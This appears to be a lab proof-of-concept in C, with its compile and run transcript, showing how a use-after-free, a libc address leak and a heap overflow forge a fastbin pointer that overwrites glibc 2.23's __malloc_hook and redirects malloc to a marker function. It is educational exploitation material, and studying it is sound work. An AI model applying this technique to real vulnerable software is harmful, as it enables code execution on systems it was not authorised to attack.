Overwrite malloc_hook via a fastbin unlink attack
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
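/* Marker routine installed as the fake __malloc_hook: when it runs, the
 * "jackpot!" line in the transcript proves the hook was overwritten.
 * Takes no arguments and returns nothing; (void) gives it a real prototype. */
void jackpot(void) { puts("jackpot!"); }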
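/*
 * Lab reproduction against the glibc build printed at the end of the
 * transcript (2.23): a free through a stale pointer plus a heap overflow
 * steer a 0x60-byte allocation onto __malloc_hook, so the following
 * malloc() runs jackpot() instead of allocating.
 *
 * Every offset below (0x68, 0x108, 0x110, 0x20 + 3, 0x13) is tied to that
 * build's main_arena layout and chunk header format; on another glibc the
 * program is expected to abort or crash rather than print "jackpot!".
 * Later glibc releases reworked this path (tcache) and recent ones no longer
 * have __malloc_hook at all, which is the mitigation that matters here.
 * The writes through p1 and past the end of p4 are use-after-free and
 * out-of-bounds accesses (undefined behaviour) and are the bug being modelled.
 */
int main(void)
{
    puts("[+] allocate p1, p2");
    char *p1 = malloc(0x100);
    char *p2 = malloc(0x100);
    printf("p1 = %p\n", p1);
    printf("p2 = %p\n", p2);

    puts("\n[+] free p1, p2");
    free(p1);
    free(p2);

    /* The transcript shows p3 == p1: p1 is now a dangling alias for p3's
     * live buffer. */
    puts("\n[+] allocate p3");
    char *p3 = malloc(0x100);
    printf("p3 = %p\n", p3);

    /* Freeing through the stale p1 releases p3's allocation underneath it. */
    puts("\n[+] p1 double free");
    free(p1);

    /* The recycled chunk still holds what the allocator left in its first
     * 8 bytes; in this run that is a main_arena address inside libc, from
     * which __malloc_hook is located by a fixed, build-specific offset.
     * Pointer arithmetic is done on char * (void * arithmetic is a GNU
     * extension). */
    puts("\n[+] leak libc address via p3");
    void *arena_top = *(void **)p3;
    void *malloc_hook = (char *)arena_top - 0x68;
    printf("arena_top = %p\n", arena_top);
    printf("malloc_hook = %p\n", malloc_hook);

    /* p4 reuses the same address once more (see transcript). */
    puts("\n[+] allocate p4");
    char *p4 = malloc(0x100);
    printf("p4 = %p\n", p4);

    /* p5 sits immediately after p4 and is freed into the 0x70 fastbin. */
    puts("\n[+] allocate p5 with size 0x60");
    char *p5 = malloc(0x60);
    printf("p5 = %p\n", p5);

    puts("\n[+] free p5");
    free(p5);

    /* Out-of-bounds write past p4's 0x100 bytes into the header of the
     * freed p5 chunk: its size field (kept at 0x71 so the bin check still
     * passes) and its forward pointer, which is aimed near __malloc_hook
     * with a misaligned offset so the fake chunk carries a plausible size.
     * The size is stored as an integer; the original stored 0x71 through a
     * void ** and drew gcc's -Wint-conversion warning seen in the transcript. */
    puts("\n[+] abuse p4 overflow");
    memset(p4, 'A', 0x100);
    *(size_t *)(p4 + 0x108) = 0x71;
    *(void **)(p4 + 0x110) = (char *)malloc_hook - 0x20 - 3;

    /* First allocation drains the real p5 chunk; the second returns the
     * forged address: the transcript shows p7 == malloc_hook - 0x13. */
    puts("\n[+] allocate p6, p7 with size 0x60");
    char *p6 = malloc(0x60);
    char *p7 = malloc(0x60);
    printf("p6 = %p\n", p6);
    printf("p7 = %p\n", p7);

    /* Fill the padding, then place jackpot's address exactly on
     * __malloc_hook. */
    puts("\n[+] overwrite *(p7+0x13) = malloc_hook");
    memset(p7, 'A', 0x13);
    *(void **)(p7 + 0x13) = (void *)jackpot;

    /* With the hook set, malloc() dispatches to jackpot() and hands back
     * whatever it returned; the transcript shows p8 = 0x9 (puts's return
     * value), so p8 is not a usable pointer. */
    puts("\n[+] allocate p8");
    char *p8 = malloc(0x100);
    printf("p8 = %p\n", p8);
    return 0;
}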
$ gcc fastbins_malloc_hook.c -o fastbins_malloc_hook
fastbins_malloc_hook.c: In function ‘main’:
fastbins_malloc_hook.c:45:26: warning: assignment makes pointer from integer without a cast [-Wint-conversion]
 *(void **)(p4+0x108) = 0x71;
                      ^
$ ./fastbins_malloc_hook
[+] allocate p1, p2
p1 = 0xd36420
p2 = 0xd36530
[+] free p1, p2
[+] allocate p3
p3 = 0xd36420
[+] p1 double free
[+] leak libc address via p3
arena_top = 0x7f30e669eb78
malloc_hook = 0x7f30e669eb10
[+] allocate p4
p4 = 0xd36420
[+] allocate p5 with size 0x60
p5 = 0xd36530
[+] free p5
[+] abuse p4 overflow
[+] allocate p6, p7 with size 0x60
p6 = 0xd36530
p7 = 0x7f30e669eafd
[+] overwrite *(p7+0x13) = malloc_hook
[+] allocate p8
jackpot!
p8 = 0x9
$ /lib/x86_64-linux-gnu/libc.so.6
GNU C Library (Ubuntu GLIBC 2.23-0ubuntu3) stable release version 2.23, by Roland McGrath et al.
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Compiled by GNU CC version 5.3.1 20160413.
Available extensions:
crypt add-on version 2.1 by Michael Glad and others
GNU Libidn by Simon Josefsson
Native POSIX Threads Library by Ulrich Drepper et al
BIND-8.2.3-T5B
libc ABIs: UNIQUE IFUNC
For bug reporting instructions, please see:
<https://bugs.launchpad.net/ubuntu/+source/glibc/+bugs>.